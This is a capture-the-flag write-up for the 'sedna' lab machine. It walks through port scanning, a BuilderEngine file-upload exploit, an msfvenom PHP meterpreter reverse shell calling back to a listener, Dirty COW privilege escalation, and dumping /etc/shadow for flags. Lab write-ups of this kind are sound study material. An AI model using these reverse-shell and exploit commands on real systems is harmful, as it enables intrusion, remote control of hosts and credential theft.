sedna/README

Recon Phase:


nmap -p 1-65535 -T4 -A -v 172.16.34.154

    PORT      STATE SERVICE     VERSION
    22/tcp    open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
    |   2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
    |_  256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
    53/tcp    open  domain      ISC BIND 9.9.5-3-Ubuntu
    | dns-nsid:
    |_  bind.version: 9.9.5-3-Ubuntu
    80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    | http-robots.txt: 1 disallowed entry
    |_Hackers
    |_http-server-header: Apache/2.4.7 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    110/tcp   open  pop3?
    111/tcp   open  rpcbind     2-4 (RPC #100000)
    | rpcinfo:
    |   program version   port/proto  service
    |   100000  2,3,4        111/tcp  rpcbind
    |   100000  2,3,4        111/udp  rpcbind
    |   100024  1          33379/udp  status
    |_  100024  1          42181/tcp  status
    139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    143/tcp   open  imap        Dovecot imapd
    |_imap-capabilities: CAPABILITY
    445/tcp   open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
    993/tcp   open  ssl/imap    Dovecot imapd
    |_imap-capabilities: CAPABILITY
    | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
    | Issuer: commonName=localhost/organizationName=Dovecot mail server
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2016-10-07T19:17:14
    | Not valid after:  2026-10-07T19:17:14
    | MD5:   a32c 1b8e 97f3 210f d238 ba3d ac45 74f7
    |_SHA-1: 0b7b 4229 b7af 8f89 d533 2ecf 5a1f f652 a015 0295
    |_ssl-date: TLS randomness does not represent time
    995/tcp   open  ssl/pop3s?
    | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
    | Issuer: commonName=localhost/organizationName=Dovecot mail server
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2016-10-07T19:17:14
    | Not valid after:  2026-10-07T19:17:14
    | MD5:   a32c 1b8e 97f3 210f d238 ba3d ac45 74f7
    |_SHA-1: 0b7b 4229 b7af 8f89 d533 2ecf 5a1f f652 a015 0295
    |_ssl-date: TLS randomness does not represent time
    8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
    | http-methods:
    |   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
    |_  Potentially risky methods: PUT DELETE
    |_http-open-proxy: Proxy might be redirecting requests
    |_http-server-header: Apache-Coyote/1.1
    |_http-title: Apache Tomcat
    42181/tcp open  status      1 (RPC #100024)

$ dirb http://172.16.34.154
Then i played around those files then i navigated to /themes/ and those themes for BuilderEngine V3
http://172.16.34.154/themes/default_theme_2015/description.txt
    Default 2015 Theme for BuilderEngine V3.
http://172.16.34.154/themes/default_theme_2016/description.txt
    Default Theme 2016 for BuilderEngine V3.
==========================================================
Attacking Phase:


Ok! so i tried BuilderEngine 3.5.0 - Arbitrary File Upload exploit
https://www.exploit-db.com/exploits/40390/

      <html>
      <body>
      <form method="post" action="http://172.16.34.154/themes/dashboard/assets/
      plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
          <input type="file" name="files[]" />
          <input type="submit" value="send" />
      </form>
      </body>
      </html>

Then i generated a reverse php shell
    msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.34.1 LPORT=1234 -f raw > shell.php

and then uploaded shell.php via BuilderEngine exploit
then i did setup for multihandler
$ msf > use exploit/multi/handler
$ msf exploit(handler) > set payload php/meterpreter/reverse_tcp
$ msf exploit(handler) > set lhost 172.16.34.1
$ msf exploit(handler) > set lport 1234
$ msf exploit(handler) > exploit
Then i started the php shell via http://172.16.34.154/files/shell.php
Then i got a shell
$ cat /var/www/flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289 ===> First flag
==========================================================
I used Dirty Cow https://www.exploit-db.com/exploits/40616/ to become root
i compiled it x86
$ gcc cowroot.c -o cowroot -pthread
$ ./cowroot
$ echo 0 > /proc/sys/vm/dirty_writeback_centisecs
$ id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
$ cat /root/flag.txt
a10828bee17db751de4b936614558305 ===> Second flag
==========================================================
$ cat /etc/shadow
crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/
1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5 ===> Third Flag
==========================================================